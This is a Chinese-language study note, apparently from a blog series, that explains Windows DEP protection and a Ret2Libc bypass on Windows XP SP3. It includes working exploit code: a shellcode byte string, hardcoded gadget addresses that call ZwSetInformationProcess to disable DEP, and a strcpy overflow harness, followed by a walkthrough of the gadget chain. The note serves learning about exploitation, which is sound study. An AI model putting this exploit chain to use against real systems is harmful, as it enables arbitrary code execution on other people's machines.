漏洞學習筆記-014-DEP的介紹
阿新 • • 發佈:2020-12-08
Windows的DEP保護和簡單的攻擊方法
本文來源:Moeomu的部落格
DEP的介紹
溢位攻擊的根源是未準確區分資料和程式碼,但是重新設計計算機結構是不太可能的事情,所以使用各種辦法去減緩溢位攻擊
原理
- 將資料所在的記憶體頁標為不可執行,而程式成功溢位進入shellcode時,CPU將會丟擲執行異常
- DEP分為軟體DEP和硬體DEP,而軟體DEP指的是SafeSEH,硬體DEP在AMD平臺上稱為No-Execute Page-Protection(NX),Intel平臺上稱為Execute Disable Bit(XD)
- 作業系統通過設定記憶體頁的NX和XD標記,來指明不能從此執行程式碼,PageTable中插入一個標記來標識此頁是否執行執行指令,0表示允許,1表示不允許
DEP的工作狀態
- Optin:允許系統元件和服務使用DEP,其它程式將不予保護,而使用者可以通過ACT工具標記程式使用DEP,這種保護可以被程式動態關閉,多用於普通使用者作業系統
- Output:為排除列表外的程式啟用DEP,多用於伺服器作業系統
- AlwaysOn:對所有的程式應用DEP保護,不可被關閉,只有64位作業系統才使用此模式
- AlwaysOff:一般不用
編譯選項
/NXCOMPAT
編譯選項將在PE頭中設定IMAGE_DLLCHARACTERISTICS_ NX_COMPAT
標識,位於IMAGE_OPTIONAL_HEADER
中的DllCharacteristics
,此值為0x100
時表示啟用DEP
利用Ret2Libc挑戰DEP
原理
- DEP保護時溢位失敗的原因是DEP檢測到程式碼在非可執行頁上執行,如果讓程式直接跳轉到一個已存在的系統函式中,必然不會被攔截
Ret2Libc
是Return-to-libc
的簡寫,如果將每條exploit都找到一條在系統lib中的替代品,那麼此exp一定可以正確執行,但問題在於不是每條指令都不包含0,不斷的跳轉容易跳錯地方- 以下是三個可行的方法
- 跳轉到
ZwSetinfomationProcess
函式將DEP關閉,轉入shellcode執行 - 跳轉到
VirtualProtect
將shellcode頁面設為可執行,隨後轉入shellcode執行 - 跳轉到
VirtualAlloc
申請一段可執行的記憶體空間隨後跳入shellcode執行
- 跳轉到
嘗試ZwSetinfomationProcess關閉DEP
前置內容
- 一個程序的DEP標識存在於
KPROCESS
結構的_KEXECUTE_OPTION
上,可以通過API函式修改
_KEXECUTE_OPTION
結構
Pos0ExecuteDisable:1bit
Pos1ExecuteEnable:1bit
Pos2DisableThunkEmulation:1bit
Pos3Permanent:1bit
Pos4ExecuteDispatchEnable:1bit
Pos5ImageDispatchEnable:1bit
Pos6Spare:2bit
- 當前程序DEP開啟的時候,
ExecuteDisable
將會被設定為1 - 當前程序DEP關閉的時候,
ExecuteEnable
將會被設定為1 DisableThunkEmulation
為了相容ATL被設定Permanent
被置1後表示這些標誌都不能再被修改- 我們只要將
_KEXECUTE_OPTIONS
的值設定為0x02(00000010)
就可以將ExecuteEnable
置為1
shellcode原理
LdrpCheckNXCompatibility
函式為了檢查DEP相容性,滿足以下條件之一將可以關閉DEP- DLL受SafeDisc版權保護系統保護
- DLL中含有
.aspack
,.pcle
,.sforce
等位元組的時候 - DLL存在於登錄檔宣告的不需啟用DEP的模組的時候
HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\ Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
程式碼
測試環境:系統:Windows XP SP3,DEP狀態:Optout,編譯器:VC6,編譯選項:禁用優化,版本:release
ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;
ZwSetInformationProcess(
NtCurrentProcess(), // Handle(-1)
ProcessExecuteFlags, //0x22
&ExecuteFlags, // ptr to 0x2
sizeof(ExecuteFlags) //0x4
);
#include <string.h>
#include <windows.h>
char shellcode[] =
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6B\x61\x6F\x6F\x68\x4D\x69\x73\x61\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C" // mov eax, 1
"\x96\x73\x1B\x5D" // mov ebp, esp & esp+8
"\x1E\xAD\x17\x5D" // esp+0x24
"\xB4\xC1\xC5\x7D" // jmp esp
"\x90\x90\x90\x90"
"\x24\xCD\x93\x7C" // call Close DEP
"\x90\x90\xE9\x2D" // jmp to shellcode start
"\xFF\xFF\xFF\x90"
;
void test()
{
char tt[176];
strcpy(tt,shellcode);
}
int main()
{
HINSTANCE hInst = LoadLibrary("shell32.dll");
char temp[200];
test();
return 0;
}
技術細節
- 需要對比al是否為1,所以第一步retn將會返回到
mov eax, 1
,retn
的地址,此地址將會返回到修繕ebp的位置 - 因為在呼叫函式之前,會訪問ebp中的值,但是它已經被刷寫掉了,所以將修繕ebp,在此使用了
push esp
,pop ebp
,retn
三條指令將esp中的地址賦值給ebp,由於retn後面跟著數字,因此ebp將會加上這個數字,也就是ebp+8
,此時ebp小於esp了,一旦呼叫子程式將會對棧區進行破壞,所以依舊得將ebp再加上一些,我在此選擇將esp加上0x24,與之前的0x8湊成了0x30的棧空間,這樣在返回的時候將會返回到語句retn 0x24
retn 0x24
語句在返回的時候將會返回到呼叫關閉DEP的函式ZwSetInformationProcess
的地方,呼叫完畢後將會使用leave語句並retn,因此它將會返回到jmp esp
的地址處- 由
jmp esp
跳轉到\x24\xCD\x93\x7C
資料存放的地址處,而此垃圾資料將不會影響shellcode的執行 - 在垃圾資料的後方寫入一個跳轉即可,至此跳到shellcode真實執行之處